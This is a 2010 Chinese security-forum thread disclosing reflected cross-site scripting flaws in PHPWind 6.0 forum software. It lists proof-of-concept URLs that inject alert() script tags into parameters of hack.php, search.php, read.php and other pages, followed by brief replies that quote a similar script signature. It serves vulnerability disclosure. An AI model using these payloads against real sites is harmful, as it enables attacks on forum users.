找回密码
 注册创意安天

PHPWind 6.0多个跨站脚本漏洞

[复制链接]
发表于 2010-3-24 23:03 | 显示全部楼层 |阅读模式
PHPWind是一款国内比较流行的基于PHP的Web论坛程序。

PHPWind在访客注销时没有正确的过滤提交给hack.php、search.php、read.php、post.php、thread.php、 profile.php、sort.php、message.php、userpay.php等页面的请求参数,远程攻击者可以提交恶意请求执行跨站脚本攻击。
测试代码:
http://www.hackqing.cn/hack.php?H_name=bank"><script>alert(/qing/);</script>
http://www.hackqing.cn/search.php?asc=desc"><script>alert(/qing/);</script>
http://www.hackqing.cn/read.php?nowtime="><script>alert(/qing/);</script>
http://www.hackqing.cn/post.php?fid=10"><script>alert(/qing/);</script>
http://www.hackqing.cn/profile.php?action=forumright"><script>alert(/qing/);</script>
http://www.hackqing.cn/thread.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/message.php?action=scout"><script>alert(/qing/);</script>
http://www.hackqing.cn/sort.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/userpay.php?skinco=black"><script>alert(/qing/);</script>
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpwind.net
发表于 2010-3-28 00:40 | 显示全部楼层
<Script>alert("XSS it then Hack it!") </Script>
回复

使用道具 举报

发表于 2010-4-2 01:04 | 显示全部楼层
<Script>alert("Check it then Hack it! Debug it then Crack it! ") </Script>


你的签名很有趣啊
回复

使用道具 举报

发表于 2010-4-2 01:04 | 显示全部楼层
alert("Check it then Hack it! Debug it then Crack it! ")


你的签名很有趣啊
mirk 发表于 2010-4-2 01:04
回复

使用道具 举报

发表于 2010-4-2 08:56 | 显示全部楼层
mirk 发表于 2010-4-2 01:04



    必须的啊!~呵呵!~玩的就是个性!嘿嘿!~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

Archiver|手机版|小黑屋|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-11-23 16:07

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表